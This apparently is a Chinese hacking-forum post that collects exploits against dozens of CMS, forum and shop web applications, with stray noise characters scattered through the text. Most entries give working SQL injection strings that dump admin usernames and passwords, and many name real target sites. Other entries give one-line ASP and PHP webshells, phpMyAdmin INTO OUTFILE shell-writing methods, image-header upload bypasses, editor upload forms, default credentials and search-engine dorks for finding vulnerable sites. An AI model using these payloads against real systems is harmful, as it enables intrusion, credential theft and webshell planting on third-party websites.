启航企业建站系统 cookie注入漏洞通杀所有版本
! R2 K: L L) v4 u. s3 F' |7 H# w! W
直接上exploit:
7 m7 K' ?" e i+ {" c% A% pjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
# O3 P6 a! |/ p& Ftest:http://www.tb11.net/system/xitong/shownews.asp?id=210
" \/ i9 n( b v3 B: h3 c7 w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 ~2 t! V A, g& b6 [% R
Asprain论坛 注册用户 上传图片就可拿到webshell
3 X) @/ T B" g( K! ^. B% t) ]& \' \3 S
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
! A3 m9 Y" s- Z$ }9 z5 p' j0 l! f1.txt存放你的一句话马 如:<%execute(request("cmd"))%>* @3 m. U& b A' [( o
2.gif 为一小图片文件,一定要小,比如qq表情图片
( @: M3 B, n' N* a3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用! G+ U! t- X+ P3 x$ _
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
* J5 z, Z7 m( \. n0 t) ?5.q.asp;.gif
; j& R+ y6 I2 i9 @; z5 i$ B* Xgoogle:Powered by Asprain
( M# F X7 f7 Q1 H$ G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 Q9 m6 N) n: W5 k& Y! _# N
7 h) Q) X' V* E9 R: gShopNum1全部系统存在上传漏洞。# \- W% d: j* \" r9 K/ |3 `4 P
8 [ k# A8 b1 F" {! E, S
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
! `+ F( O1 T2 y4 {3 C& p3 o按说明 提示登录后台。。& p5 k0 S9 @8 T) _
在后台功能页面->附件管理->附件列表
% J1 I7 P, `- _; s* j4 _可以直接上传.aspx 后缀木马
; q1 A& L* J/ ]" Z, ]3 `- shttp://demo.shopnum1.com/upload/20110720083822500.aspx
" f' q* P& ~# E2 i7 X--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: X- g* u8 o+ X x4 @- m, f8 \
9 X9 P+ l( S8 g: A2 W) l- V牛牛CMS中小企业网站管理系统 上传漏洞
3 B' c% w5 `7 E" q4 b" W7 b. u. Z! j. b$ v# e0 `* e
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
I: ?% U8 O2 A& @: ]& |后台:admin/login.asp
% y! \9 x# p* [0 U8 s( tewebeditor 5.5 Nday
- H9 E. y8 d L" gexp:& D( t( g# X& k6 O% Z' \' ^
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
( E& Z. n" _, D: p( R* |* M<input?type=file?name=uploadfile?size=100><br><br>?
9 ]2 N, o) A) b& t, p/ g3 L9 O<input?type=submit?value=upload>?
) ]7 K. f. e c# `5 s5 c</form>
2 p! q' [9 U8 G5 V6 @$ ?ps:先上传小马.
" W2 x3 r$ E% [) |# Jinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏( Q) `9 W+ Q/ W, _% a9 \1 Y0 V
1 W+ a" M% U% V8 [" B: t1 t6 Q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( X5 W' t9 _& ?' A3 _8 P4 A& m' b" _ b0 ^$ m. n8 T1 D
YothCMS 遍历目录漏洞" F" F1 n0 k. [, f7 y
; Q9 ?2 [/ k5 @6 E @
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。' F9 Z7 }. l2 |
默认后台:admin/login.asp
! z) ]+ f2 j0 B1 L! v遍历目录:
3 a) f7 ?2 E! @( Y5 c+ {6 Rewebeditor/manage/upload.asp?id=1&dir=../
6 x7 o8 |$ \" }9 l4 [data:
2 m+ }1 V4 S. w' ]5 a, H( ^4 dhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa5 h; }2 u0 j" s# V' A P
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 P, F" J8 |3 A
9 ~! t& {: A) T0 q, x" A
Net112企业建站系统 1.0
& i/ w- ^2 g3 J* f0 J2 k/ H" K( S4 W0 S
源码简介:$ N+ I4 }- H1 c C5 Y( e
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。+ \3 A1 O3 f' b, d, O
添加管理员:
5 Y$ C x; i# S/ `1 m: Mhttp://www.0855.tv/admin/admin.asp?action=add&level=2; F; u' M! b% K, z- E& V5 X
其实加不加都不是很重要,后台文件都没怎么作验证。
$ W: j% y$ V$ S9 p, M; m上传路径:3 [* e& n% x4 u* F7 b, D
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200' W% U% o1 E2 W0 |2 p0 v2 d
http://www.0855.tv/inc/Upfile.asp?Stype=23 x, v+ k! `5 e+ u
怎么利用自己研究。, f1 x7 T$ D5 \
遍历目录:
3 b: D+ E% x3 i, w0 shttp://www.0855.tv/admin/upfile.asp?path=../..7 |; t. w+ Q0 i# F& J% _2 E8 h6 P
如:
8 q/ n r) p$ {$ J! I M! M% Chttp://www.0855.tv/admin/upfile.asp?path=../admin
( k, A2 {0 z1 f" B# D: s! U9 Xhttp://www.0855.tv/admin/upfile.asp?path=../data0 {- p4 @; P) j+ s. i
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- B( ?* e7 \4 g) F) ?
3 M/ X; R7 ]' V( Q+ N易和阳光购物商城通杀 上传漏洞
; t$ e; m; u1 U, w B" U. l2 y
+ U# N6 L& b% h) F! z" t前提要求是IIS6.0+asp坏境。
: {. Y, `* k. z F# v! a4 o漏洞文件Iheeo_upfile.asp
$ N1 A% J2 V! r过滤不严.直接可以iis6.0上传
& K1 j* I" D. \, T7 Y0 j把ASP木马改成0855.asp;1.gif! p* V1 f/ x* y7 g4 B, o
直接放到明小子上传
4 ? ~5 ?9 } g8 z4 o5 MGoogle搜索:inurl:product.asp?Iheeoid=
% ?* p) C1 R4 M' y( k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, |) u' l* b2 v( z3 L& N" b; Y: z' }8 @5 ^0 [% S- }
phpmyadmin后台4种拿shell方法
; U0 ]* _0 { w
: `& j4 K- z/ d1 x方法一:9 n5 A* S( z" ~2 k' R4 o5 c
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );& z% E* C" Y9 i: |6 ^" M6 c$ a
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
& G3 Z0 z5 `9 rSELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';0 ?, y0 {$ Q O& y) e+ B
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
; C$ b, \( V" y g* `3 ^- T一句话连接密码:xiaoma2 |, o7 p' M. P' n' ]; [
方法二:
2 A& r0 c4 m: h. pCreate TABLE xiaoma (xiaoma1 text NOT NULL);
8 T9 }% ?# Y' A) a X4 uInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');1 r' g" }* e0 W) Z
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
' P& ~) ], ?8 |5 b2 K% {Drop TABLE IF EXISTS xiaoma;
; Q/ L( D) @- v% S5 }$ ~4 z. ]方法三:& O. P7 ~6 g. n, f3 a2 A4 ~
读取文件内容: select load_file('E:/xamp/www/s.php');; r. S/ Z8 @! b) X# H4 j
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php') H3 s* P- R8 T2 V$ c, H& ]8 R- ~- L
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
; k( ]* z( ~: E: v* m7 [方法四:: n4 M: g {# C/ Z
select load_file('E:/xamp/www/xiaoma.php');
( t2 s0 m; s" D6 w: `9 m$ ^3 jselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'; _4 [5 D3 c! O5 E% J3 R; q7 @
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir5 K; n! T# d2 O8 _
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& F z- s: R, H1 X0 e7 e
6 L6 {' s2 Q- `2 l! |传信网络独立开发网站源码0day漏洞2 B! q- p1 j% w/ ]& R( w
9 |$ Y% ]# F2 q& a0 L1 o后台system/login.asp- `6 V5 T$ ^1 k6 P
进了后台有个ewebeditor: n) p3 ^' T) q: A D. D
Google 搜索inurl:product1.asp?tyc=& w& }2 H2 O$ D; U* G% ~
编辑器漏洞默认后台ubbcode/admin_login.asp
; X9 u0 n" B2 ?: t$ q- r数据库ubbcode/db/ewebeditor.mdb
1 n. q2 C! {$ `) w2 M" ]1 f! n4 e, W默认账号密码yzm 1111119 {; h* v& w l5 f: ~* n
) X$ W8 |- g6 O Q7 x9 {- h8 Z9 t
拿webshell方法
# Z; W, ~' Y3 R& R) E登陆后台点击“样式管理”-选择新增样式 # ?5 E! j$ z8 y" M
样式名称:scriptkiddies 随便写 , e% n& |1 M9 O& R1 J1 G) P' Z
路径模式:选择绝对路径
/ d0 E, F% z D; U6 j7 x图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
* u2 F2 P0 Q: q# `图片类型比如就是我们要上传的ASP木马格式6 U6 ]0 K& `) T7 ~+ {
上传路径:/
& u- x0 t2 S' [- Z图片限制:写上1000 免的上不了我们的asp木马" `; ]: R& \ m. f* e' _" b
上传内容不要写4 ]/ F% @4 o8 C, M
可以提交了
2 e& Y1 t0 P* z$ a0 C# r样式增加成功! 7 C: A; |- S0 y- L9 c/ |
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
% v; J/ ]1 n; _2 S8 C* l按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置# t: [ B+ [; Y) B* w) l6 C- G& _
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
* w& e" y1 N1 e9 b上ASP木马 回车 等到路径# z' P* X0 Z9 u
' [$ n6 X5 `$ i; y5 _1 }0 M! P5 ^ m
后台:system/login.asp: I0 `" V z& G" U J
Exp:
3 ?1 b, W$ G) L# P" [8 Pand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master: u7 M) @) i3 X+ F/ j- v" ?6 c
测试:. q' z% p: j" A' ~
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master) E% G5 h% F. y2 I) C6 P2 _1 x
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
' x* b9 J) a" S1 E. N. J/ B--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) w1 c* b: a5 K+ }8 q, A, o x c$ y; O' O
foosun 0day 最新注入漏洞$ u3 @% |# \4 }7 A2 m5 a
: T$ c- { q/ ?2 I' W9 R漏洞文件:www.xxx.com/user/SetNextOptions.asp
" o7 U& ]; }6 U- V7 X利用简单的方法:% f h+ X4 Z: `% } y$ y5 O r
暴管理员帐号:
( j: g1 f: i& u; W) i- r9 K3 R8 xhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin5 K& u& c! y0 [; t, F7 q( d) i
暴管理员密码:* F1 T' z A* m3 I
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
+ g o5 `7 N, u: x$ q" {--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 j5 t6 z# g' z$ [% Y! o2 o1 B3 `; H G' l
网站程序的版权未知!) U+ j8 Y" o; d3 T9 w/ b; F, Y0 @
) @- v5 j% b1 s默认网站数据库:: J- t7 l, U3 l6 T9 {
www.i0day.com/data/nxnews.mdb
! ?4 J* t' U# T8 K7 L; U! Iewebeditor 在线编辑器:5 W& [# @9 u* _9 u7 @" x7 w- R
编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
3 H; N) {. r* f+ A+ `* o登录地址:ewebeditor/admin_login.asp% f+ k( N l9 S, Y0 V
默认密码:admin admin
8 c4 g7 `1 m, X& b+ R登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
) {" N$ a- l% L0 Z6 y9 r8 ]7 T2 e3 Z/ w$ D! e7 K
Sql注入漏洞:
& {- F5 X2 _, L' `/ ]4 ?http://www.i0day.com/detail.asp?id=12: h" ?5 t a& [7 V. d' J9 v
exp:7 M9 N( ?. `, s5 z0 [
union select 1,admin,password,4,5,6,7,8 from admin
7 L! Q8 a! D: k o4 |$ b- C爆出明文帐号/密码% N+ t, l" b4 W1 S+ _
2 F' t! x: w. j+ k/ k- t' |, p
上传漏洞:
4 ]. _' B& V, n( N1 O( \* @( `后台+upfile.asp
) P5 S( h0 \/ d- t如:5 Z- U) H& E; T$ d* _
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。9 u! e2 e+ K3 e; E: v7 X/ f
shell的地址:网址+后台+成功上传的马
0 x0 z q7 g# ?" agoogle:inurl:news.asp?lanmuName=1 }" @" ~9 F$ e: u5 R2 a0 ^
------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 k3 L7 g/ F9 n8 X2 |) m4 `
: b' v9 U) P8 a: x- L
dedecms最新0day利用不进后台直接拿WEBSHELL' `* h s* I! e* J. h$ c
, ?2 \& v& s& k8 m8 p3 v% z拿webshell的方法如下:. T7 x& \% D) U% N6 F! [
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.: `! P0 d5 E: ~
前题条件,必须准备好自己的dede数据库,然后插入数据:
3 n+ a0 X! z9 l3 f0 d+ A$ Jinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); , g. h w% h4 e' {) C `
4 g! U5 W4 s9 Q. u' G$ u# j, r! l再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
" d. E0 l5 S$ q' w<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
9 z7 W' v8 H8 L# j: u3 V; T<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
8 n& [. z' D3 s {% G# b' x<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br /> J9 \4 Y4 B/ S7 [
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
( i r9 b( C/ m p1 S/ a<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />7 D' k& Z* V% W
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
8 W- N7 C: d* Y+ T<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />3 c6 ~. ]8 Q8 G9 t
<input type="text" value="true" name="nocache" style="width:400">8 y5 I; V2 W7 j0 q: y
<input type="submit" value="提交" name="QuickSearchBtn"><br />; J9 h! H6 b" }7 y- A* O# J7 m
</form>
- U5 U! f4 ?5 ]+ S( M* o<script>
$ b# ~8 m: A! R6 h' cfunction addaction()% I! I( k# O/ Q2 W" ^
{
; Y. M# S" U* I$ ^8 m9 }- Vdocument.QuickSearch.action=document.QuickSearch.doaction.value;) U: a) u7 D9 r& X
}
, J* n4 l" ?- n) l E" E</script>
& F9 Q+ n( P( w- X6 M! Y* E, ~-----------------------------------------------------------------------------------------------------------------------------------------------% }, d0 b8 d- |
* K) l ~5 X' W6 p& v4 S: e- H( adedecms织梦暴最新严重0day漏洞
$ h& r1 Y* s1 {$ Vbug被利用步骤如下:
\5 l4 G6 u" g) M5 Chttp://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
! d, {2 J0 J: h O2 W把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
( }& N7 T8 U4 b( w-------------------------------------------------------------------------------------------------------------------------------------------
+ y/ [/ }8 D& K- J% n9 M5 q Q4 K1 K/ F) a5 Z$ B2 i/ T6 e, \
多多淘宝客程序上传漏洞
6 A# x& |1 T2 c漏洞页面:7 L* C. w3 @0 b$ M
admin\upload_pic.php
4 e; u# z& t" ?; O" r8 h传送门:
% \6 e( ?$ T3 U2 [9 shttp://www.www.com/admin/upload_pic.php?uploadtext=slide15 T4 P3 D" e7 S2 ?5 l8 \2 O
PS:copy张图片马 直接 xxx.php 上传抓包地址! E, `1 o9 g, y: E3 u8 c
------------------------------------------------------------------------------------------------------------------------------------------------------+ _3 W8 J# B3 L3 _( l0 O5 U
/ M; y5 `( s: N4 p. k4 ~$ S1 R1 O. [. X无忧公司系统ASP专业版后台上传漏洞
8 ^5 G+ d6 D* ~! F% ]5 B) T漏洞文件 后台上传
1 u" v, J% ?% o5 g* a. k: J0 A: ?$ ^admin/uploadPic.asp# G( t6 m |- U& ~1 S$ Y
漏洞利用 这个漏洞好像是雷池的
( i$ D* L* v1 `$ z/ ^% khttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
' D0 g+ R/ d* N. m# x5 a, @! m/ d* W' H等到的webshell路径:2 S) x3 ]( O3 I9 Q
/UploadFiles/scriptkiddies.asp;_2.gif
) J4 R4 C3 ~6 }---------------------------------------------------------------------------------------------------------------------------------------------------
8 v6 j1 P- j$ Q0 K# h T. [! @$ Z$ s) B" Y$ h# G
住哪酒店分销联盟系统2010! m4 F# v( p6 R( Z# p$ ]- g
Search:
: o/ W0 {1 ?* S9 y, h S# Kinurl:index.php?m=hotelinfo4 o0 v% _; y0 f! O3 R: P+ u- n
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
; `9 s) `; D1 p( J% s- n' E默认后台:index.php?m=admin/login! X) q. H% {: U8 M. U7 _
--------------------------------------------------------------------------------------------------------------------------------------------------
1 l |1 ?4 @* z, h% _1 d9 n2 {# [7 ~1 _
inurl:info_Print.asp?ArticleID=
. C" D$ g3 Y* S+ r后台 ad_login.asp/ u- w6 W/ d' T( I
爆管理员密码:8 k& \# Y1 C) J/ W, m" f
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
8 d& K3 L/ z# e3 o------------------------------------------------------------------------------------------------------------------------------------------------------------
" c: M( S `3 E; |
+ K. H0 B; z( V; d/ g/ w搜索框漏洞!! p3 l9 H6 O4 t0 E
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'=' C; J* U3 g8 ^2 a7 B( ^( M& }
--------------------------------------------------------------------------------------------------------------------------------------------------------; B1 E( u$ y2 K; |/ g' M" @# E0 Y
6 k2 b% r0 W6 F8 R' i4 R" w
关键字:
- ~/ ]! ^$ Q4 J; w" Finurl:/reg_TemletSel.asp?step=2
9 L9 M4 P! D' d1 Y- @2 T或者 s; ^! u6 M* ^ _1 T$ Y6 V+ v" f
电子商务自助建站--您理想的助手/ L- y6 i+ ~' @" ]7 V7 O9 }
-------------------------------------------------------------------------------------------------------------------------------------------------3 N5 s, }5 i7 U0 W$ c% \9 D7 d
* [9 T7 O# Q# Z/ M
iGiveTest 2.1.0注入漏洞! ?* n. B: @! B3 J8 O, \
Version: <= 2.1.0: R. X4 B+ T/ C! e! y7 q6 [
# Homepage: http://iGiveTest.com/
- X. _7 m. s$ `0 n O谷歌关键字: “Powered by iGiveTest”
2 Y& S$ V5 D1 n6 K! W( K8 ]4 u随便注册一个帐号。然后暴管理员帐号和密码
2 \; }5 L% ~( g4 S# ?http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1. s5 b. Q$ T) I2 I9 N5 I5 a
------------------------------------------------------------------------------------------------------------------------------------------------
" G5 L% }1 G) ?) B3 x
" Y- v8 M0 z5 p% w2 p! JCKXP网上书店注入漏洞9 h5 e8 A) B* N: l
工具加表:shop_admin 加字段:admin
4 {1 u0 T3 c& n* Z5 e% u! i后台:admin/login.asp % W/ y' R* ]( i9 `+ o* h
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
; q( i2 }9 }# v% k$ |- @# einurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
3 h' ]% k5 H9 s/ W" c: f+ ?0 e--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 Y7 D3 }3 Y6 j1 O& r }' Q3 T
/ H0 @. ~0 U. m段富超个人网站系统留言本写马漏洞
: A- Y0 n% [% `& {3 s源码下载:http://www.mycodes.net/24/2149.htm
5 }$ h5 M% s. }8 j6 ]; T+ ~addgbook.asp 提交一句话。
6 @$ m+ K" U g, @连接: http://www.xxxx.tv/date/date3f.asp
0 W* F1 W& ^1 [/ k a% L8 tgoogle:为防批量,特略!
; M3 x9 Q7 X G-------------------------------------------------------------------------------------------------------------------------------------------------------------------------# t9 ~! B9 s1 P: Z+ W( I+ u/ `
/ C$ c- D$ g$ j1 @3 u
智有道专业旅游系统v1.0 注入及列目录漏洞
7 R* U: ^( t5 V2 Y7 S, i默认后台路径:/admin/login.asp
6 r; {& i0 q$ l/ i默认管理员:admin$ w6 o, o5 h4 w' i9 ^: f- ^: t
默认密码:123456) n, }3 A4 `9 G; B+ O" b: n
SQL EXP Tset:
' d7 V8 N* ~3 @1 ~http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin5 K+ K' Q. w, M: {. b' _/ I
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ~7 m9 d) k0 n0 J9 v5 S$ k- C9 u/ C
ewebeditor(PHP) Ver 3.8 本任意文件上传0day9 B B6 R: U; Y* l! M( ], B
EXP:
: r- l0 V2 V( |1 m! P, c<title>eWebeditoR3.8 for php任意文件上EXP</title>
* M l+ e/ G ?- m<form action="" method=post enctype="multip
. r+ `# A6 f+ t, Jart/form-data">
* v& H, Q: }6 J4 M" _<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> . j( u# s2 m" ^6 U
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ( Y4 B" B6 l, l# ~5 G
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
0 ^6 \+ ?& x. @3 ]6 Y8 Qfile:<input type=file name="uploadfile"><br> : n; c$ e* F7 d! i
<input type=button value=submit onclick=fsubmit()>
, e) [8 u e6 c5 I1 E</form><br>
, k7 h6 O# p/ }<script> 8 m& t( x" {7 e7 Z& T% R
function fsubmit(){
" p6 x/ p' x. _" c0 E* Oform = document.forms[0]; % g j) c9 m. G% i6 J7 O$ M" M6 ~
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; N! p0 S3 i: p# b9 S7 w( W5 O* e( F
alert(form.action); # ~6 Z4 c6 ^$ u3 o( e
form.submit();
- a. s4 {) M% Y7 [ f. s* p6 I% F} 2 b$ E @7 {/ ^1 s; c+ T
</script>
4 K6 n$ S$ x" u+ S注意修改里面ewebeditor的名称还有路径。
& y1 X; @- k$ R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 {; b2 U5 B) L
4 Y! ]# u% n: w. r/ T! }, U Y提交’时提示ip被记录 防注入系统的利用
# \. X, B: }& l+ T网址:http://www.xxx.com/newslist.asp?id=122′
: H5 C% \. _; n s提示“你的操作已被记录!”等信息。
7 y* a3 h6 c* h& p; s利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。2 |" q3 L: L" L
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 b. N4 V, M) J1 d
R$ b$ x- C% l% Q( k西部商务网站管理系统 批量拿shell-0day4 _3 r) g9 W/ q \7 S9 E
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
( ^' f( c6 u. J# G" X1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
7 g/ p' z; p8 J! B& q3 F* j2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
! t4 `8 ]5 A7 {' O) Z$ Z' n: E% S u3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
/ [4 S, p4 C j& N% W% W9 L6 R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------, y: z# Q# p; p m. S5 m
: E/ o1 K4 Y. q. j1 k
JspRun!6.0 论坛管理后台注入漏洞
Q q# n( }3 ]$ U/ W
8 n$ T8 Q5 ]7 C9 wSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
" P: _' S0 E+ K7 j9 ^JspRun!6.0 # }! p4 Y2 b+ I: f/ {; o) o
漏洞描述:; p; G- N& R; r- ^2 v# R$ Y
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。' q8 p% ?( M. s2 H) s
在处理后台提交的文件中ForumManageAction.java第1940行
, L, q0 X7 h" x! {. jString export = request.getParameter("export");//直接获取,没有安全过滤4 F) T7 k- l9 {7 ~8 f7 [
if(export!=null){& [ O# o( y* ~1 Z# a* m$ i! s
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...1 o# [- A0 O$ u
if(styles==null||styles.size()==0){
* m- r) g8 R* Z<*参考: d( r9 Y2 M/ o) I* J @/ M
nuanfan@gmail.com9 L9 j& c) v% t, J( l
*> SEBUG安全建议:6 f4 H+ X. w* T* |
www.jsprun.net
) X$ `& Z4 M S* X(1)安全过滤变量export' ^1 E. U% k! u% T3 ^ m
(2)在查询语句中使用占位符
( j0 @! T2 T v& E$ B( K# H, ]% Z------------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 [7 h9 p+ h% t0 }; e! m
# }% G# \/ \3 k2 [! n4 m乌邦图企业网站系统 cookies 注入
# R$ d# a% j3 ~4 L. ~9 Y
. {& @' M, V' U( J4 Q1 k, B/ u程序完整登陆后台:/admin/login.asp& j( k1 @8 Q0 K3 E
默认登陆帐号:admin 密码:admin888
; f! ~( ]; c2 c! m9 U3 A9 T3 ~语句:(前面加个空格)
* B$ u8 ~- x+ eand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin5 e, U' z, y1 r4 n3 H3 F( K
或者是16个字段:
* g$ l; b3 k9 v2 V) iand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
8 f( n& J- S. T6 V& Y爆不出来自己猜字段。
: c U8 L8 A# t6 ~! p8 g注入点:http://www.untnt.com/shownews.asp?=88( h2 Q% [. X1 Q2 E% I0 O* A; o
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
1 [/ K4 |& D" F7 o) B关键字:
5 b6 q( j S) n4 E' G6 e: f- |inurl:shownews?asp.id=
* o* ] X+ {9 P C X% l-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, L& A# X( h, F" F$ c# w: h E% \# B7 {% g5 {3 l( X X
CKXP网上书店注入漏洞
" c; U8 Z+ L/ ~# J8 `/ W: ^4 S& K! E7 {* B0 E/ q0 s
工具加表:shop_admin 加字段:admin
4 U- d( |% h2 m+ |后台:admin/login.asp ; O9 M6 D! h& a7 ~0 i3 }
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
/ Q, y0 N2 }% q7 F hinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息% G: k- t- G* x
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------# Y& W; W, M+ o" p
- ]. F. t7 U8 J* G$ eYxShop易想购物商城4.7.1版本任意文件上传漏洞4 G+ }& l1 e0 f
, j4 E* p; L, u4 \3 X+ lhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx! s" t. @9 L+ r6 ~ p
跳转到网站根目录上传任意文件。
